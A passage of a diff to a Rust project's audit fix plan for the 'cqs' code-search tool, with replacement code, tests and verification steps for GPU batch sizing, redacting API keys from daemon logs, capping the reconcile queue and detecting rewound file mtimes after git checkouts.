-    // With BGE-large (1024 dim, 512 seq): 64 * 512 * 1024 * 4 ≈ 130 MB
-    // Scale inversely as dim or seq grow.
-    let baseline = 64.0_f64;
-    let dim_factor = 1024.0 / model.dim as f64;
-    let seq_factor = (512.0 / model.max_seq_length as f64).max(0.25);
-    let scaled = (baseline * dim_factor * seq_factor).max(1.0) as usize;
-    // Round to nearest power of 2 for ORT efficiency
-    scaled.next_power_of_two().min(256).max(2)
-}
+pub(crate) use types::embed_batch_size_for;
+#[cfg(test)]
+pub(crate) use types::embed_batch_size;
 ```
 
-Replace `embed_batch_size()` callers with `embed_batch_size_for(&self.model_config)`.
+Update `parser_stage` to take a `ModelConfig` (already in scope at the only caller site, `pipeline/mod.rs:80-94`). Update its signature in `parsing.rs:18-25`:
 
-### Notes
+```rust
+//   src/cli/pipeline/parsing.rs:14 — adjust import
+use super::types::{embed_batch_size_for, file_batch_size, ParsedBatch, RelationshipData};
 
-- BGE-large + 512 seq + 64 batch = OK on RTX 4060 8GB. Nomic-coderank + 2048 seq + 64 batch OOMs.
-- Optional follow-on: query GPU VRAM via `nvml-wrapper` (transitive via cuVS) and target 25% of free VRAM.
+//   src/cli/pipeline/parsing.rs:18-25 — extend the context struct
+pub(super) struct ParserStageContext {
+    pub root: PathBuf,
+    pub force: bool,
+    pub parser: Arc<CqParser>,
+    pub store: Arc<Store>,
+    pub parsed_count: Arc<AtomicUsize>,
+    pub parse_errors: Arc<AtomicUsize>,
+    pub model_config: cqs::embedder::ModelConfig,
+}
+
+//   src/cli/pipeline/parsing.rs:28-42 — read from ctx instead of hardcoded
+pub(super) fn parser_stage(
+    files: Vec<PathBuf>,
+    ctx: ParserStageContext,
+    parse_tx: Sender<ParsedBatch>,
+) -> Result<()> {
+    let _span = tracing::info_span!("parser_stage").entered();
+    let ParserStageContext {
+        root,
+        force,
+        parser,
+        store,
+        parsed_count,
+        parse_errors,
+        model_config,
+    } = ctx;
+    let batch_size = embed_batch_size_for(&model_config);
+    let file_batch_size = file_batch_size();
+```
+
+In `pipeline/mod.rs:80-94` (the parser_handle spawn), thread `model_config`:
+
+```rust
+    let parser_handle = {
+        let parser = Arc::clone(&parser);
+        let store = Arc::clone(&store);
+        let parsed_count = Arc::clone(&parsed_count);
+        let parse_errors = Arc::clone(&parse_errors);
+        let root = root.to_path_buf();
+        let model_config = model_config.clone();
+        thread::spawn(move || {
+            parser_stage(
+                files,
+                ParserStageContext {
+                    root,
+                    force,
+                    parser,
+                    store,
+                    parsed_count,
+                    parse_errors,
+                    model_config,
+                },
+                parse_tx,
+            )
+        })
+    };
+```
+
+For `enrichment.rs`, plumb the `ModelConfig` through. Update the signature at line 23:
+
+```rust
+//   src/cli/enrichment.rs:23
+pub(crate) fn enrichment_pass(
+    store: &Store,
+    embedder: &Embedder,
+    model_config: &cqs::embedder::ModelConfig,
+    quiet: bool,
+) -> Result<usize> {
+    let _span = tracing::info_span!("enrichment_pass").entered();
+```
+
+And at line 73-74 in `enrichment.rs`:
+
+```rust
+    // SHL-V1.30-1: model-aware batch size so nomic-coderank (768 dim,
+    // 2048 seq) doesn't OOM at batch=64 on an 8 GB GPU.
+    let enrich_embed_batch: usize = super::pipeline::embed_batch_size_for(model_config);
+```
+
+Update the only production caller at `src/cli/commands/index/build.rs:520-522`:
+
+```rust
+        let model_config = cli.try_model_config()?.clone();
+        let embedder = Embedder::new(model_config.clone())
+            .context("Failed to create embedder for enrichment pass")?;
+        match enrichment_pass(&store, &embedder, &model_config, cli.quiet) {
+```
+
+Update test fixtures in `src/cli/pipeline/mod.rs` and `src/cli/pipeline/parsing.rs` that construct `ParserStageContext` directly to pass `model_config: cqs::embedder::ModelConfig::resolve(None, None)`. (`resolve` returns `Self` directly per `src/embedder/models.rs:427`, *not* a `Result`/`Option` — a stray `.unwrap()` here will fail to compile.) The pre-existing test `test_embed_batch_size` already serializes via `TEST_ENV_MUTEX`, so it stays valid using the test-only `embed_batch_size()`.
+
+### Verification
+
+- `cargo build --features cuda-index` (the `#[cfg(test)]` gate forces a compile-error on any production caller that still uses bare `embed_batch_size()`)
+- `cargo build --features cuda-index 2>&1 | grep -i warning` — confirm no dead-code warnings on `embed_batch_size_for`
+- `cargo test --features cuda-index --lib pipeline::tests::test_embed_batch_size`
+- `cargo test --features cuda-index --lib pipeline::parsing::tests`
+- Manual: `RUST_LOG=cqs::cli::pipeline=debug cqs index --model nomic-coderank` should log `embed_batch_size_for: model-derived default rounded=16` (768 dim, 2048 seq) instead of the legacy 64.
+- `grep -rn "embed_batch_size()" /mnt/c/Projects/cqs/src/cli/ --include='*.rs' | grep -v cfg(test)` — should return zero non-test matches.
 
 ---
 
-## P2.42 — SHL: `CagraIndex::gpu_available` no VRAM ceiling — OOMs on 8GB GPUs
+## P1.10: SEC-V1.30.1-8 — daemon env snapshot logs `CQS_LLM_API_KEY` to journal
 
-**Finding:** P2.42 in audit-triage.md
-**Files:** `src/cagra.rs:262-264`
+**Files:** `src/cli/watch/mod.rs:525-532`
+**Effort:** ~10 minutes
+**Why:** On daemon startup, the code iterates every `CQS_*` env var and logs the values via `tracing::info!(cqs_vars = ?cqs_vars, "Daemon env snapshot")`. The list is not redacted. `CQS_LLM_API_KEY` (used by `src/llm/local.rs:110` per the audit) is one of the env knobs that flows through this snapshot if set. With OB-V1.30-1 having raised the default subscriber to surface info-level events to systemd-journald, every daemon start now writes the API key into a 30-day journal artifact. Same class as P1.13 (auth token printed to stdout).
 
 ### Current code
 
 ```rust
-pub fn gpu_available() -> bool {
-    cuvs::Resources::new().is_ok()
+//   src/cli/watch/mod.rs:525-532
+        // OB-NEW-2: Self-maintaining env snapshot — iterate every CQS_*
+        // variable instead of a hardcoded whitelist that drifts as new
+        // knobs are added. Env vars set on client subprocesses do NOT
+        // affect daemon-served queries; only the daemon's own env applies.
+        let cqs_vars: Vec<(String, String)> = std::env::vars()
+            .filter(|(k, _)| k.starts_with("CQS_"))
+            .collect();
+        tracing::info!(cqs_vars = ?cqs_vars, "Daemon env snapshot");
+```
+
+### Replacement
+
+```rust
+        // OB-NEW-2 / SEC-V1.30.1-8: Self-maintaining env snapshot —
+        // iterate every CQS_* variable instead of a hardcoded whitelist
+        // that drifts as new knobs are added. Env vars set on client
+        // subprocesses do NOT affect daemon-served queries; only the
+        // daemon's own env applies.
+        //
+        // Redact secrets — any var whose name suffix matches a known
+        // secret marker is logged with `<redacted len=N>` instead of
+        // the value. With OB-V1.30-1 surfacing info-level to journald,
+        // an unredacted log lands in a 30-day journal artifact.
+        const SECRET_SUFFIXES: &[&str] =
+            &["_API_KEY", "_TOKEN", "_PASSWORD", "_SECRET"];
+        let cqs_vars: Vec<(String, String)> = std::env::vars()
+            .filter(|(k, _)| k.starts_with("CQS_"))
+            .map(|(k, v)| {
+                let is_secret = SECRET_SUFFIXES
+                    .iter()
+                    .any(|suffix| k.ends_with(suffix));
+                let value = if is_secret {
+                    format!("<redacted len={}>", v.len())
+                } else {
+                    v
+                };
+                (k, value)
+            })
+            .collect();
+        tracing::info!(cqs_vars = ?cqs_vars, "Daemon env snapshot");
+```
+
+### Verification
+
+- `cargo build --features cuda-index`
+- Add a regression test (in `src/cli/watch/tests.rs` or a new `#[cfg(test)] mod` in `mod.rs`):
+  ```rust
+  #[test]
+  fn env_snapshot_redacts_api_key() {
+      // CQS_LLM_API_KEY mustn't land in journald.
+      // Build the same redaction logic and assert against a fixture.
+      const SECRET_SUFFIXES: &[&str] =
+          &["_API_KEY", "_TOKEN", "_PASSWORD", "_SECRET"];
+      let pairs = vec![
+          ("CQS_LLM_API_KEY".to_string(), "sk-real-secret".to_string()),
+          ("CQS_TELEMETRY".to_string(), "1".to_string()),
+      ];
+      let redacted: Vec<(String, String)> = pairs
+          .into_iter()
+          .map(|(k, v)| {
+              let is_secret = SECRET_SUFFIXES
+                  .iter()
+                  .any(|suffix| k.ends_with(suffix));
+              let value = if is_secret {
+                  format!("<redacted len={}>", v.len())
+              } else {
+                  v
+              };
+              (k, value)
+          })
+          .collect();
+      assert_eq!(
+          redacted[0].1, "<redacted len=14>",
+          "CQS_LLM_API_KEY value must not appear in plaintext"
+      );
+      assert_eq!(redacted[1].1, "1", "CQS_TELEMETRY is non-secret, kept verbatim");
+  }
+  ```
+- `cargo test --features cuda-index --lib env_snapshot_redacts_api_key`
+- Manual: `CQS_LLM_API_KEY=sk-test-secret CQS_TELEMETRY=1 cqs watch --serve` then `journalctl --user-unit cqs-watch | grep cqs_vars` should show `<redacted len=14>`, never `sk-test-secret`.
+
+---
+
+## P1.11: DS-V1.30.1-D2 — `run_daemon_reconcile` bypasses `max_pending_files()` cap
+
+**Files:** `src/cli/watch/reconcile.rs:63-148`, callers at `src/cli/watch/mod.rs:1055-1061,1268-1274`
+**Effort:** ~20 minutes
+**Why:** The inotify ingest path at `events.rs:108` enforces `pending_files.len() < max_pending_files()` before inserting and increments `dropped_this_cycle` when the queue is full. `run_daemon_reconcile` blindly inserts every divergent file with no cap check. On a `git checkout` of a sibling branch with 50k file changes, reconcile pushes the queue size to 50k. Two consequences: (1) the queue overshoots `max_pending_files()` (default 10000), making subsequent inotify drops look like sustained pressure when they're actually held above the cap by reconcile; (2) the next `process_file_changes` parses + embeds 50k synchronously while holding the index lock. The whole point of `max_pending_files()` is to bound per-cycle work; reconcile defeats it.
+
+### Current code
+
+```rust
+//   src/cli/watch/reconcile.rs:63-148
+pub(super) fn run_daemon_reconcile(
+    store: &Store,
+    root: &Path,
+    parser: &CqParser,
+    no_ignore: bool,
+    pending_files: &mut HashSet<PathBuf>,
+) -> usize {
+    let _span = tracing::info_span!("daemon_reconcile").entered();
+
+    // Walk disk → set of relative paths visible to indexing.
+    let exts = parser.supported_extensions();
+    let disk_files = match cqs::enumerate_files(root, &exts, no_ignore) {
+        Ok(v) => v,
+        Err(e) => {
+            tracing::warn!(error = %e, "Reconcile: enumerate_files failed");
+            return 0;
+        }
+    };
+
+    // One SELECT pulls every indexed source-file origin + its stored
+    // mtime. Map keyed by origin string for cheap lookups in the loop.
+    let indexed = match store.indexed_file_origins() {
+        Ok(m) => m,
+        Err(e) => {
+            tracing::warn!(error = %e, "Reconcile: indexed_file_origins failed");
+            return 0;
+        }
+    };
+
+    let mut added = 0usize;
+    let mut modified = 0usize;
+    let mut queued = 0usize;
+    for rel in disk_files {
+        // Stored origins are typically relative; normalize to forward
+        // slashes for cross-platform matching parity with the rest of the
+        // store layer.
+        let origin = rel.to_string_lossy().replace('\\', "/");
+        match indexed.get(&origin) {
+            None => {
+                // ADDED: no chunks for this file in the index. Queue.
+                if pending_files.insert(rel.clone()) {
+                    added += 1;
+                    queued += 1;
+                }
+            }
+            Some(stored_mtime) => {
+                // MODIFIED: same path indexed, but mtime moved forward.
+                // `None` stored mtime → treat as stale (legacy schema).
+                let lookup_path: PathBuf = if rel.is_absolute() {
+                    rel.clone()
+                } else {
+                    root.join(&rel)
+                };
+                let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+                    Ok(t) => t
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .ok()
+                        .map(cqs::duration_to_mtime_millis),
+                    Err(_) => None,
+                };
+                let needs_reindex = match (stored_mtime, disk_mtime) {
+                    (Some(stored), Some(disk)) => disk > *stored,
+                    (None, _) => true,        // legacy/null stored mtime
+                    (Some(_), None) => false, // can't read disk mtime → leave to GC
+                };
+                if needs_reindex && pending_files.insert(rel.clone()) {
+                    modified += 1;
+                    queued += 1;
+                }
+            }
+        }
+    }
+
+    if queued > 0 {
+        tracing::info!(
+            queued,
+            added,
+            modified,
+            "Reconcile: queued divergent files for reindex"
+        );
+    } else {
+        tracing::debug!("Reconcile: no divergence detected");
+    }
+
+    queued
 }
 ```
 
 ### Replacement
 
-Probe GPU VRAM and gate on estimated build memory:
-
 ```rust
-pub fn gpu_available_for(n_vectors: usize, dim: usize) -> bool {
-    if cuvs::Resources::new().is_err() {
-        return false;
-    }
-    // Estimate build memory: dataset bytes + graph bytes + ~30% slack
-    let dataset_bytes = (n_vectors * dim * 4) as u64;
-    let graph_bytes = (n_vectors * 64 * 4) as u64; // graph_degree default 64
-    let estimated = (dataset_bytes + graph_bytes) * 130 / 100;
+pub(super) fn run_daemon_reconcile(
+    store: &Store,
+    root: &Path,
+    parser: &CqParser,
+    no_ignore: bool,
+    pending_files: &mut HashSet<PathBuf>,
+    max_pending: usize,
+) -> usize {
+    let _span = tracing::info_span!("daemon_reconcile", max_pending).entered();
 
-    let cap = std::env::var("CQS_CAGRA_MAX_GPU_BYTES")
-        .ok().and_then(|s| s.parse::<u64>().ok())
-        .unwrap_or_else(|| {
-            // Best-effort: query free VRAM. If we cannot, fall back to a
-            // conservative 2 GiB cap so 8 GiB GPUs don't OOM.
-            cuvs_free_vram_bytes().unwrap_or(2 * 1024 * 1024 * 1024)
-        });
-    if estimated > cap * 80 / 100 {
-        tracing::warn!(estimated, cap, "GPU has insufficient free VRAM for CAGRA build — falling back to HNSW");
-        return false;
-    }
-    true
-}
-
-// Back-compat shim:
-pub fn gpu_available() -> bool { Self::gpu_available_for(0, 0) }
-```
-
-Caller in `cli/store.rs::build_vector_index_with_config` switches to `gpu_available_for(chunk_count, dim)`.
-
-### Notes
-
-- `cuvs_free_vram_bytes()` may need to call CUDA's `cudaMemGetInfo` directly via FFI if `cuvs` doesn't expose it. Investigate before signing off.
-- A6000 48GB hosts are unaffected; RTX 4000 8GB benefits.
-
----
-
-## P2.43 — `semantic_diff` sort tie-breaker (already fixed — pin with test)
-
-**Finding:** P2.43 in audit-triage.md
-**Files:** `src/diff.rs:202-218` — fix already on disk (cascade on `(file, name, chunk_type)`).
-
-### Regression-pin test
-
-```rust
-#[cfg(test)]
-mod determinism_tests {
-    use super::*;
-
-    #[test]
-    fn semantic_diff_sort_is_deterministic_under_shuffled_input() {
-        // Build a DiffResult with 5 modified entries, all similarity=0.73
-        // and varying (file, name) tuples.
-        let entries = vec![
-            DiffEntry { file: "z.rs".into(), name: "a".into(), similarity: Some(0.73), chunk_type: ChunkType::Function, /* ... */ },
-            DiffEntry { file: "a.rs".into(), name: "z".into(), similarity: Some(0.73), chunk_type: ChunkType::Function, /* ... */ },
-            // ... 3 more
-        ];
-        let mut runs = Vec::new();
-        for _ in 0..50 {
-            let mut shuffled = entries.clone();
-            // Use a different random seed each iteration
-            shuffled.shuffle(&mut rand::thread_rng());
-            // Re-run the production sort
-            shuffled.sort_by(/* the cascade from src/diff.rs:208-218 */);
-            runs.push(shuffled);
+    // Walk disk → set of relative paths visible to indexing.
+    let exts = parser.supported_extensions();
+    let disk_files = match cqs::enumerate_files(root, &exts, no_ignore) {
+        Ok(v) => v,
+        Err(e) => {
+            tracing::warn!(error = %e, "Reconcile: enumerate_files failed");
+            return 0;
         }
-        // Assert all 50 produced the same order
-        for w in runs.windows(2) {
-            assert_eq!(w[0], w[1], "sort must be deterministic across input shuffles");
+    };
+
+    // One SELECT pulls every indexed source-file origin + its stored
+    // mtime. Map keyed by origin string for cheap lookups in the loop.
+    let indexed = match store.indexed_file_origins() {
+        Ok(m) => m,
+        Err(e) => {
+            tracing::warn!(error = %e, "Reconcile: indexed_file_origins failed");
+            return 0;
         }
-    }
-}
-```
+    };
 
-### Notes
-
-- Production code at `src/diff.rs:208-218` already cascades — this test pins it so a future regression is loud.
-
----
-
-## P2.44 — `is_structural_query` end-of-query keyword (already fixed — pin with test)
-
-**Finding:** P2.44 in audit-triage.md
-**Files:** `src/search/router.rs:806-817` — fix already on disk (uses `words.iter().any(|w| w == kw)` instead of `format!(" {} ", kw)`).
-
-### Regression-pin test
-
-```rust
-#[cfg(test)]
-mod structural_query_tests {
-    use super::*;
-
-    #[test]
-    fn structural_keywords_at_end_of_query_route_correctly() {
-        // Each of these ends with a structural keyword and must be is_structural=true
-        for q in &["find all trait", "show me all trait", "find every impl", "list all enum", "all class", "find enum"] {
-            assert!(is_structural_query(q), "query `{}` must classify as structural", q);
+    let mut added = 0usize;
+    let mut modified = 0usize;
+    let mut queued = 0usize;
+    let mut skipped_at_cap = 0usize;
+    for rel in disk_files {
+        // DS-V1.30.1-D2: respect the same cap as the inotify path so a
+        // bulk branch switch (50k files) doesn't drown the next
+        // `process_file_changes` cycle. Files we skip here are picked
+        // up by the next reconcile pass — the walk is idempotent.
+        if pending_files.len() >= max_pending {
+            skipped_at_cap += 1;
+            continue;
+        }
+        // Stored origins are typically relative; normalize to forward
+        // slashes for cross-platform matching parity with the rest of the
+        // store layer.
+        let origin = rel.to_string_lossy().replace('\\', "/");
+        match indexed.get(&origin) {
+            None => {
+                // ADDED: no chunks for this file in the index. Queue.
+                if pending_files.insert(rel.clone()) {
+                    added += 1;
+                    queued += 1;
+                }
+            }
+            Some(stored_mtime) => {
+                // MODIFIED: same path indexed, but mtime moved forward.
+                // `None` stored mtime → treat as stale (legacy schema).
+                let lookup_path: PathBuf = if rel.is_absolute() {
+                    rel.clone()
+                } else {
+                    root.join(&rel)
+                };
+                let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+                    Ok(t) => t
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .ok()
+                        .map(cqs::duration_to_mtime_millis),
+                    Err(_) => None,
+                };
+                let needs_reindex = match (stored_mtime, disk_mtime) {
+                    (Some(stored), Some(disk)) => disk > *stored,
+                    (None, _) => true,        // legacy/null stored mtime
+                    (Some(_), None) => false, // can't read disk mtime → leave to GC
+                };
+                if needs_reindex && pending_files.insert(rel.clone()) {
+                    modified += 1;
+                    queued += 1;
+                }
+            }
         }
     }
 
+    if skipped_at_cap > 0 {
+        tracing::warn!(
+            queued,
+            skipped_at_cap,
+            cap = max_pending,
+            "Reconcile: hit pending-files cap; skipped files will be picked up on next reconcile pass"
+        );
+    } else if queued > 0 {
+        tracing::info!(
+            queued,
+            added,
+            modified,
+            "Reconcile: queued divergent files for reindex"
+        );
+    } else {
+        tracing::debug!("Reconcile: no divergence detected");
+    }
+
+    queued
+}
+```
+
+Update the two production callers in `src/cli/watch/mod.rs`:
+
+```rust
+//   src/cli/watch/mod.rs:1055-1061 (on-demand reconcile)
+                if on_demand_reconcile_requested && reconcile_enabled_flag {
+                    let queued = run_daemon_reconcile(
+                        &store,
+                        &root,
+                        &parser,
+                        no_ignore,
+                        &mut state.pending_files,
+                        max_pending_files(),
+                    );
+```
+
+```rust
+//   src/cli/watch/mod.rs:1268-1274 (periodic reconcile)
+                        let queued = run_daemon_reconcile(
+                            &store,
+                            &root,
+                            &parser,
+                            no_ignore,
+                            &mut state.pending_files,
+                            max_pending_files(),
+                        );
+```
+
+Update the 5 test call sites in `src/cli/watch/reconcile.rs:190,204,225,362,450` to pass a sentinel cap (e.g. `usize::MAX` for unbounded test behaviour, or a small number for cap-respect tests). Existing tests should mostly use `usize::MAX` so behaviour is unchanged; add a new test that exercises the cap:
+
+```rust
     #[test]
-    fn structural_keyword_as_substring_does_not_falsely_match() {
-        // "training" contains "trait" but NOT as a word — must NOT classify structural
-        assert!(!is_structural_query("training pipeline"));
+    fn run_daemon_reconcile_respects_max_pending_cap() {
+        // DS-V1.30.1-D2: cap shared with the inotify path so a bulk
+        // git-checkout doesn't drown the next process_file_changes
+        // cycle.
+        let dir = TempDir::new().unwrap();
+        let cqs_dir = dir.path().join(".cqs");
+        fs::create_dir_all(&cqs_dir).unwrap();
+        // Use the existing `open_store` helper at reconcile.rs:170 — it
+        // takes the `.cqs/` dir, not the project root. There is no
+        // `setup_store_for_test`; pinning that name was an artifact of
+        // a draft.
+        let store = open_store(&cqs_dir);
+
+        let mut pending: HashSet<PathBuf> = HashSet::new();
+        // Pre-fill 5 entries so `pending.len() >= cap=5` immediately.
+        for i in 0..5 {
+            pending.insert(PathBuf::from(format!("preexisting_{i}.rs")));
+        }
+        // Create 20 files on disk.
+        let src_dir = dir.path().join("src");
+        fs::create_dir_all(&src_dir).unwrap();
+        for i in 0..20 {
+            fs::write(src_dir.join(format!("file_{i}.rs")), "fn x(){}").unwrap();
+        }
+        let queued = run_daemon_reconcile(
+            &store,
+            dir.path(),
+            &parser(),
+            false,
+            &mut pending,
+            5, // cap is already met
+        );
+        assert_eq!(queued, 0, "cap already met → no new entries queued");
+        assert_eq!(pending.len(), 5, "pending must not exceed cap");
+    }
+```
+
+### Verification
+
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib watch::reconcile`
+- `cargo test --features cuda-index --lib watch::reconcile::tests::run_daemon_reconcile_respects_max_pending_cap`
+- Manual: with `CQS_WATCH_MAX_PENDING=10`, `git checkout` of a 47-file diff should leave `pending_files.len() == 10`, with the journal showing `Reconcile: hit pending-files cap; skipped files will be picked up on next reconcile pass cap=10 skipped_at_cap=37`.
+
+---
+
+## P1.12: AC-V1.30.1-1 — reconcile `disk > stored` strict predicate misses non-monotonic checkouts
+
+**Files:** `src/cli/watch/reconcile.rs:108-127`
+**Effort:** ~25 minutes
+**Why:** The reconcile predicate is `(stored, disk) => disk > *stored`. Reconcile is the Layer 2 safety net for bulk git operations the inotify path misses. But `git checkout` of a sibling branch restores file mtimes to **commit time** — easily *older* than the indexed `source_mtime`. Concrete repro: index `foo.rs` at HEAD (mtime=now), then `git checkout HEAD~5 -- foo.rs` where `HEAD~5` is from last week. Disk content is now different, but `disk_mtime <= stored_mtime`, so reconcile classifies the file as "fine" and skips it. The inotify path also uses `mtime <= last` (events.rs:100) — silently stale until either `cqs index --force` or the file is touched again. The bulk-delta acceptance test (#1196) only exercises forward-mtime cases.
+
+### Current code
+
+```rust
+//   src/cli/watch/reconcile.rs:108-132
+            Some(stored_mtime) => {
+                // MODIFIED: same path indexed, but mtime moved forward.
+                // `None` stored mtime → treat as stale (legacy schema).
+                let lookup_path: PathBuf = if rel.is_absolute() {
+                    rel.clone()
+                } else {
+                    root.join(&rel)
+                };
+                let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+                    Ok(t) => t
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .ok()
+                        .map(cqs::duration_to_mtime_millis),
+                    Err(_) => None,
+                };
+                let needs_reindex = match (stored_mtime, disk_mtime) {
+                    (Some(stored), Some(disk)) => disk > *stored,
+                    (None, _) => true,        // legacy/null stored mtime
+                    (Some(_), None) => false, // can't read disk mtime → leave to GC
+                };
+                if needs_reindex && pending_files.insert(rel.clone()) {
+                    modified += 1;
+                    queued += 1;
+                }
+            }
+```
+
+### Replacement
+
+```rust
+            Some(stored_mtime) => {
+                // MODIFIED: same path indexed, but disk content may have
+                // diverged. `None` stored mtime → treat as stale (legacy
+                // schema).
+                let lookup_path: PathBuf = if rel.is_absolute() {
+                    rel.clone()
+                } else {
+                    root.join(&rel)
+                };
+                let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+                    Ok(t) => t
+                        .duration_since(std::time::UNIX_EPOCH)
+                        .ok()
+                        .map(cqs::duration_to_mtime_millis),
+                    Err(_) => None,
+                };
+                // AC-V1.30.1-1: use `!=` not `>` because `git checkout`
+                // restores commit-time mtimes, which can be *older* than
+                // the indexed `source_mtime`. The inotify path's
+                // `mtime <= last` mtime-equality skip is correct for
+                // single-file edits (where mtime always advances), but
+                // reconcile exists *specifically* for bulk git ops where
+                // mtime is non-monotonic. Any disk/stored mismatch is
+                // a queue trigger; the reindex itself is content-hashed
+                // so a no-op rewrite costs only the parse + cache-hit.
+                let needs_reindex = match (stored_mtime, disk_mtime) {
+                    (Some(stored), Some(disk)) => disk != *stored,
+                    (None, _) => true,        // legacy/null stored mtime
+                    (Some(_), None) => false, // can't read disk mtime → leave to GC
+                };
+                if needs_reindex && pending_files.insert(rel.clone()) {
+                    modified += 1;
+                    queued += 1;
+                }
+            }
+```
+
+Add a regression test alongside the existing reconcile tests in the same file's `#[cfg(test)]` block. The test uses two helpers already in scope: `open_store` at `reconcile.rs:170` and `placeholder_embedding` at `reconcile.rs:271`. Disk-mtime rewinds use `std::fs::File::set_modified` (stable since Rust 1.75 — same pattern already in use at `src/store/migrations.rs:2635` and `src/cli/batch/mod.rs:2763`), which avoids adding `filetime` as a new dev-dependency:
+
+```rust
+    /// AC-V1.30.1-1: `git checkout HEAD~5 -- foo.rs` restores the file
+    /// with its commit-time mtime, which is *older* than the indexed
+    /// `source_mtime`. The strict `disk > stored` predicate would skip
+    /// this file silently. Reconcile must use `disk != stored` so any
+    /// divergence — forward or backward in time — queues a reindex.
+    #[test]
+    fn run_daemon_reconcile_queues_older_disk_mtime() {
+        use cqs::parser::{Chunk, ChunkType, Language};
+        use std::time::{Duration, SystemTime};
+
+        let dir = TempDir::new().unwrap();
+        let cqs_dir = dir.path().join(".cqs");
+        fs::create_dir_all(&cqs_dir).unwrap();
+        let src_dir = dir.path().join("src");
+        fs::create_dir_all(&src_dir).unwrap();
+
+        // Write the file with new content (post-checkout state).
+        let rel = "src/foo.rs";
+        let abs = dir.path().join(rel);
+        fs::write(&abs, "fn rewound() {}").unwrap();
+
+        // Rewind the disk mtime to a week ago to simulate `git checkout`
+        // restoring a commit-time mtime older than what we'll seed as
+        // the stored mtime. `set_modified` is stable since Rust 1.75
+        // (cqs MSRV is 1.95).
+        let week_ago = SystemTime::now() - Duration::from_secs(7 * 24 * 60 * 60);
+        let f = std::fs::OpenOptions::new().write(true).open(&abs).unwrap();
+        f.set_modified(week_ago).unwrap();
+        drop(f);
+
+        // Seed the index with a HIGHER stored_mtime than the rewound
+        // disk mtime — simulates "indexed at HEAD (today), then file
+        // rewound by checkout to last week's commit". Use a "now" stored
+        // mtime in milliseconds; even if the test runs millis after the
+        // rewind, `now > week_ago` by a comfortable margin.
+        let stored_mtime_ms = cqs::duration_to_mtime_millis(
+            SystemTime::now()
+                .duration_since(std::time::UNIX_EPOCH)
+                .unwrap(),
+        );
+        let content = "fn original() {}".to_string(); // any content; only mtime drives the predicate
+        let hash = blake3::hash(content.as_bytes()).to_hex().to_string();
+        let chunk = Chunk {
+            id: format!("{rel}:1:{}", &hash[..8]),
+            file: PathBuf::from(rel),
+            language: Language::Rust,
+            chunk_type: ChunkType::Function,
+            name: "original".to_string(),
+            signature: "fn original()".to_string(),
+            content,
+            doc: None,
+            line_start: 1,
+            line_end: 1,
+            content_hash: hash,
+            parent_id: None,
+            window_idx: None,
+            parent_type_name: None,
+            parser_version: 0,
+        };
+
+        let store = open_store(&cqs_dir);
+        store
+            .upsert_chunks_batch(
+                &[(chunk, placeholder_embedding(0.0))],
+                Some(stored_mtime_ms),
+            )
+            .expect("seed chunk at stored mtime");
+
+        let mut pending: HashSet<PathBuf> = HashSet::new();
+        let queued = run_daemon_reconcile(
+            &store,
+            dir.path(),
+            &parser(),
+            false,
+            &mut pending,
+            usize::MAX,
+        );
+
+        assert_eq!(queued, 1, "older-mtime divergent file must be queued");
+        assert!(pending.contains(&PathBuf::from(rel)));
+    }
+```
+
+(No `filetime` dependency: `std::fs::File::set_modified` is stable since Rust 1.75 and cqs MSRV is 1.95. The `open_store` and `placeholder_embedding` helpers already in `mod tests` are reused. Existing test pattern at `reconcile_detects_bulk_modify_burst` (line 304) shows the `upsert_chunks_batch` + explicit `stored_mtime_ms` shape this test mirrors.)
+
+### Verification
+
+- `cargo build --features cuda-index`
+- `cargo test --features cuda-index --lib watch::reconcile::tests::run_daemon_reconcile_queues_older_disk_mtime`
+- `cargo test --features cuda-index --lib watch::reconcile`
+- Manual on a real repo: `git checkout HEAD~5 -- src/lib.rs` then wait `CQS_WATCH_RECONCILE_SECS` seconds. `cqs status --watch-fresh --json` should show `state: "stale"` until reconcile drains; before the fix it would stay `fresh` because `disk_mtime < stored_mtime` skipped the file.
+
+---
+
+## Summary
+
+**12 distinct fix prompts cover the 14 P1 findings.** Three groupings collapsed multiple cross-listings: P1.1 (3 IDs → 1 prompt for `delta_saturated`), P1.2 (3 IDs → 1 prompt for `dropped_this_cycle`), P1.3 (2 IDs → 1 prompt for the auth ladder rewrite).
+
+**Top 5 most-touched files:**
+1. `src/watch_status.rs` — P1.1 state machine + tests
+2. `src/cli/watch/events.rs` — P1.2 reset ordering
+3. `src/serve/auth.rs` — P1.3 strip + check_request rewrite
+4. `src/cli/watch/reconcile.rs` — P1.11 cap + P1.12 mtime predicate
+5. `src/cli/pipeline/types.rs` + `parsing.rs` + `enrichment.rs` + `mod.rs` (all four touched by P1.9)
+
+**Documentation files:** SECURITY.md (P1.5, P1.7), PRIVACY.md (P1.4), ROADMAP.md (P1.8), and one fix that requires both code-change + doc-claim alignment (P1.6 — adding `trust_level` to `read --focus` and `context` so SECURITY.md:57 is no longer lying).
+
+**No P1 was skipped.** All 14 finding IDs in the triage's P1 table are covered by the 12 prompts above.
+
+---
+
+## Verification Report
+
+Generated 2026-04-28 by the verification pass. Each P1 prompt was checked against current source for line-drift, compile-correctness, edge-case coverage, caller-sweep completeness, and lying-doc fix completeness.
+
+### P1.1 — delta_saturated: VERIFIED
+
+All current/replacement code matches source verbatim (`src/watch_status.rs:199-209` for `compute()`, fields on `WatchSnapshotInput` at lines 181-193, struct field on `WatchSnapshot` at line 87). Test field types align (`incremental_count: usize`, `dropped_this_cycle: usize`, `last_event: std::time::Instant`). New tests cover the failure mode: `delta_saturated_marks_stale_when_no_other_work` triggers the saturated-rebuild → discard-on-swap path the audit finding describes. Caller sweep clean (no new call sites required since `compute()` signature is unchanged).
+
+### P1.2 — dropped_this_cycle reset before publish: VERIFIED
+
+Current code at `src/cli/watch/events.rs:131-157` matches verbatim. The successful-reindex `Ok(...)` arm starts at line 195 (prompt cite "around line 195" — exact). Replacement removes the early reset and adds it inside the success arm — the exact ordering fix the audit identifies. The verification regression-test design (seed `dropped_this_cycle=5`, fail embedder, assert no zero) matches the failure mode.
+
+### P1.3 — auth ladder leaks ?token=: VERIFIED
+
